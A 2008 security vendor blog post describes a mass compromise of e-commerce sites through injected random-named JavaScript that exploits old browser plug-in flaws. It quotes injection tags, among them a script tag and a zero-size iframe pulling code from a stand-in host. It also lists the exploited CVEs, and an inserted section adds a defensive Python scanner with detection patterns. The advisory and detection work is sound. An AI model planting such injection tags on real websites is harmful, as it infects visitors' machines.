TrendLabs received reports of a massive attack against legitimate e-commerce Web sites, particularly in the U.K., with one or two references to Dubai, UAE. These Web sites have been injected with the following tag, which loads a malicious JavaScript that takes advantage of several vulnerabilities to infiltrate an unsuspecting user's system:
<script language='JavaScript' type='text/javascript' src='{random name}.js'></script>
The random file name of the injected JavaScript makes it difficult to search for more compromised pages: there is no single URL or file name to look for. Add to that the fact that the JavaScript is hosted on the compromised domain itself, so there is no external host to block either.
This routine is unlike other compromises, where Web sites are usually injected with either a malicious iFrame or a script tag that loads JavaScript from _other_ domains, usually created and registered solely to host the malicious code or payload for these types of threats. For example:
<script language='JavaScript' type='text/javascript' src='http://otherdomain/maliciousscript.js'></script>
or
<iframe src='http://otherdomain/maliciouspage.html' width='0' height='0'></iframe>
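The three injection patterns above (a same-origin script with a random name, an off-site script, and a zero-size iframe) are simple enough to check for mechanically. The scanner below is an added example, not code from TrendLabs or from the original post: it parses a page, flags script tags that load from a host other than the site's own, flags same-origin .js files whose names look random (no word separators, a mix of letters and digits, or high character entropy), and flags hidden iframes. The sample page, the host name `shop.example`, the file name `k9j3xq2v.js` and the entropy threshold are all constructed assumptions for the example; the off-site URLs are the placeholders used in the post.

```python
import math
import re
from html.parser import HTMLParser
from posixpath import basename, splitext
from urllib.parse import urlparse

# Constructed sample page (not a real compromised site): a benign local script,
# an injected same-origin script with a random name (the pattern in the post),
# an off-site script and a zero-size iframe (the older patterns).
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="/js/jquery.js"></script>
<script language='JavaScript' type='text/javascript' src='k9j3xq2v.js'></script>
<script language='JavaScript' type='text/javascript' src='http://otherdomain/maliciousscript.js'></script>
</head><body>
<p>Welcome to our shop</p>
<iframe src=http://otherdomain/maliciouspage.html width=0 height=0></iframe>
</body></html>
"""

# Host name the scanned page is served from (assumed for this example).
SITE_HOST = "shop.example"


def shannon_entropy(text):
    """Bits per character; random strings score higher than English-like names."""
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(stem, min_len=6):
    """Heuristic for '{random name}.js': no word separators, and either a mix
    of letters and digits or high character entropy. Tune thresholds per site
    and allowlist known library names before relying on this."""
    if len(stem) < min_len or re.search(r"[-_.]", stem):
        return False
    has_alpha = re.search(r"[a-zA-Z]", stem) is not None
    has_digit = re.search(r"\d", stem) is not None
    return (has_alpha and has_digit) or shannon_entropy(stem.lower()) > 2.9


def classify_script(src, site_host):
    """Return a finding tuple for a <script src=...>, or None if it looks benign."""
    parsed = urlparse(src)
    if parsed.netloc and parsed.netloc.lower() != site_host.lower():
        return ("offsite-script", src)
    stem, ext = splitext(basename(parsed.path))
    if ext.lower() == ".js" and looks_random(stem):
        return ("random-local-script", src)
    return None


def is_hidden(attrs):
    """Zero-size or CSS-hidden iframe: the classic drive-by container."""
    for key in ("width", "height"):
        if (attrs.get(key) or "").strip().rstrip("px") == "0":
            return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class InjectionScanner(HTMLParser):
    """Collects suspicious script and iframe tags from one HTML document."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "script" and a.get("src"):
            finding = classify_script(a["src"], self.site_host)
            if finding:
                self.findings.append(finding)
        elif tag == "iframe" and a.get("src") and is_hidden(a):
            self.findings.append(("hidden-iframe", a["src"]))


def scan_html(html, site_host):
    """Return a list of (kind, src) findings for the given page."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_HTML, SITE_HOST):
        print(f"{kind}: {src}")
```

Run this over every page a site serves (or over a crawl of the document root) rather than a single page: the attack described here placed the random-named file on the compromised server, so a hit on one page is a reason to check the rest of the host and the server logs. The randomness heuristic will produce false positives on minified bundles with hashed names, which is why known file names should be allowlisted per site.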
The following are some of the known vulnerabilities that this JavaScript exploits:
- AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
- Apple QuickTime {qtl} File Handling Remote Command Injection Vulnerability
- GomWebCtrl.GomManager.1 ActiveX controls (GomWeb3.dll) OpenURL() Buffer Overflow
- Microsoft Internet Explorer daxctle.ocx KeyFrame Method Memory Corruption
- NCTAudioFile2 SetFormatLikeSample ActiveX Buffer Overflow
- WebViewFolderIcon ActiveX control vulnerability (Exploit-CVE2006-3730)
How the sites themselves were compromised in the first place, however, has not been determined. Security researchers are still baffled by this event.
Users whose browsers run this malicious JavaScript ultimately download a malicious .MOV file and Trojan programs onto their computers. Trend Micro detects the malicious JavaScript as JS_IESLICE.AQ and the malicious .MOV file as a variant of XML_HACK. The downloaded Trojan programs are detected as TROJ_DROPPER.NH and TROJ_AGENT.HJS.
As we know, the motivation behind cyberattacks nowadays is money. This is likely just the first in a long series of e-commerce-related invasions in 2008, if companies and users don't take extra measures to secure their online businesses. Keep your software updated and be extra vigilant when doing business online. It's still not too late to add another resolution for '08.
Trend Micro Research Project Manager Ivan Macalintal says that this compromise is still under investigation. He adds: “Updates will be posted as soon as new information arrives so you better stay tuned!”
Many thanks to Mary Landesman of ScanSafe for providing the initial report on the topic.
January 15th, 2008 at 12:26 am
[...] References: Mass web infection leaves researcher scratching her head; Hackers turn Cleveland into malware server; Mass Web Infections; E-commerce Sites Invaded [...]
January 24th, 2008 at 1:53 pm
[...] around for all you windows users out there. There’s discussion on it at Linux.com, WebHostingTalk, TrendMicro, and the Internet Storm Center. I have verified our server has not been infected. It does seem to [...]
February 23rd, 2008 at 3:00 pm
[...] Also read this! To help us solve that puzzling question, Dan Goodin at The Register generously wrote about the challenges of this attack, and that article has prompted much useful discussion. It’s also helped foster a great deal of cooperation from some of the impacted hosts and site owners; cooperation that will be key to solving this puzzle. And it’s also led to additional exposure and discussion of the problem here and here. [...]